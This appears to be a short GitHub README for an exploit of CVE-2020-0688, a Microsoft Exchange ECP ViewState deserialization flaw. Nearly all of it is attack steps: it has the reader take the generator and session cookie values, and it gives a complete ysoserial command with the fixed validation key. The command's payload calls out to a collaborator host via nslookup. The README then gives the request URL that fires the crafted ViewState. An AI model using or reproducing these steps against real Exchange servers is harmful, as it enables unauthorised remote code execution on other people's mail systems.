/cve-2020-0688

cve-2020-0688

Primary LanguagePython

cve-2020-0688

cve-2020-0688

Login with a user with an email address privliage is nothing to worry about.

Grab - __VIEWSTATEGENERATOR from page source Grab - the value of ASP.NET_SessionId cookie for viewstateuserkey value

Download YSO Here

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

GET TO:

https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>

The Exploit.py is untested and need a demo system to fire up and play with.